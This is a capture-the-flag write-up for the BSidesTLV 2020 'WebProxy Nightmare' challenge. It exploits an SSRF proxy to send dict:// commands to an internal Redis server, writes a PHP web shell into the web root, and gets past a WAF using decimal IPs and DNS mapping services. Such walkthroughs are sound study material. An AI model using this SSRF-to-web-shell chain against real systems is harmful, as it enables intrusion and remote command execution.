WebProxy Nightmare
- Category: Web
- 400 Points
- Solved by the JCTF Team
Description
Solution
This is the follow-up challenge for WebProxy.
Again, we start by changing the csurl parameter to localhost:
root@kali:/media/sf_CTFs/bsidestlv/WebProxy_Nightmare# curl http://webproxy2.ctf.bsidestlv.com:8002/?csurl=http://127.0.0.1As a response, we get a table with the following content:
| Service name: | IP Address: | Port: |
|---|---|---|
| Redis | 10.42.106.242 | 6379 |
| NGINX | 10.42.249.43 | 80 |
We should probably try to see what happens when we run our original solution on the new server (after changing the IP address):
root@kali:/media/sf_CTFs/bsidestlv/WebProxy_Nightmare# python3 solve.py
Sending request to: 'dict://10.42.106.242:6379/CONFIG SET dir /var/www/html'
Sending request to: 'dict://10.42.106.242:6379/CONFIG SET dbfilename shell.php'
Sending request to: 'dict://10.42.106.242:6379/SET mykey2 "<\x3Fphp echo \"\\n\"; system($_GET[\'command\']); exit;\x3F>"'
Sending request to: 'dict://10.42.106.242:6379/SAVE'
Sending request to: 'http://10.42.106.242:80/shell.php?command=cat $(find / -name flag.txt)'
BLOCKED BY WAF!So there's a WAF here blocking access to the Redis server.
Turns out we can easily bypass it by changing the IP address.
One methods is using a decimal representation of the IP address:
IP_ADDR = int(ipaddress.ip_address('10.42.106.242'))Output:
root@kali:/media/sf_CTFs/bsidestlv/WebProxy_Nightmare# python3 solve.py
Sending request to: 'dict://170552050:6379/CONFIG SET dir /var/www/html'
Sending request to: 'dict://170552050:6379/CONFIG SET dbfilename shell.php'
Sending request to: 'dict://170552050:6379/SET mykey2 "<\x3Fphp echo \"\\n\"; system($_GET[\'command\']); exit;\x3F>"'
Sending request to: 'dict://170552050:6379/SAVE'
Sending request to: 'http://170552050:80/shell.php?command=cat $(find / -name flag.txt)'
REDIS0006ş flag!BsidesTLV2020{Y0u_4r3_A_Genius!!} mykey22<?php echo "\n"; system($_GET['command']); exit;?>ÿÙ�ÈŞÀRfİAnother options is to use a DNS mapping service such as 1u.ms or nip.io that map a subdomain to an IP address based on the subdomain name:
IP_ADDR = "make-10.42.106.242-rr.1u.ms"
IP_ADDR = "10.42.106.242.nip.io"Output:
root@kali:/media/sf_CTFs/bsidestlv/WebProxy_Nightmare# python3 solve.py
Sending request to: 'dict://make-10.42.106.242-rr.1u.ms:6379/CONFIG SET dir /var/www/html'
Sending request to: 'dict://make-10.42.106.242-rr.1u.ms:6379/CONFIG SET dbfilename shell.php'
Sending request to: 'dict://make-10.42.106.242-rr.1u.ms:6379/SET mykey2 "<\x3Fphp echo \"\\n\"; system($_GET[\'command\']); exit;\x3F>"'
Sending request to: 'dict://make-10.42.106.242-rr.1u.ms:6379/SAVE'
Sending request to: 'http://make-10.42.106.242-rr.1u.ms:80/shell.php?command=cat $(find / -name flag.txt)'
REDIS0006ş flag!BsidesTLV2020{Y0u_4r3_A_Genius!!} mykey22<?php echo "\n"; system($_GET['command']); exit;?>ÿÙ�ÈŞÀRfİ
root@kali:/media/sf_CTFs/bsidestlv/WebProxy_Nightmare# python3 solve.py
Sending request to: 'dict://10.42.106.242.nip.io:6379/CONFIG SET dir /var/www/html'
Sending request to: 'dict://10.42.106.242.nip.io:6379/CONFIG SET dbfilename shell.php'
Sending request to: 'dict://10.42.106.242.nip.io:6379/SET mykey2 "<\x3Fphp echo \"\\n\"; system($_GET[\'command\']); exit;\x3F>"'
Sending request to: 'dict://10.42.106.242.nip.io:6379/SAVE'
Sending request to: 'http://10.42.106.242.nip.io:80/shell.php?command=cat $(find / -name flag.txt)'
REDIS0006þ flag!BsidesTLV2020{Y0u_4r3_A_Genius!!}ÿKp¿’Ú“ÊrThat wasn't such a nightmare after all.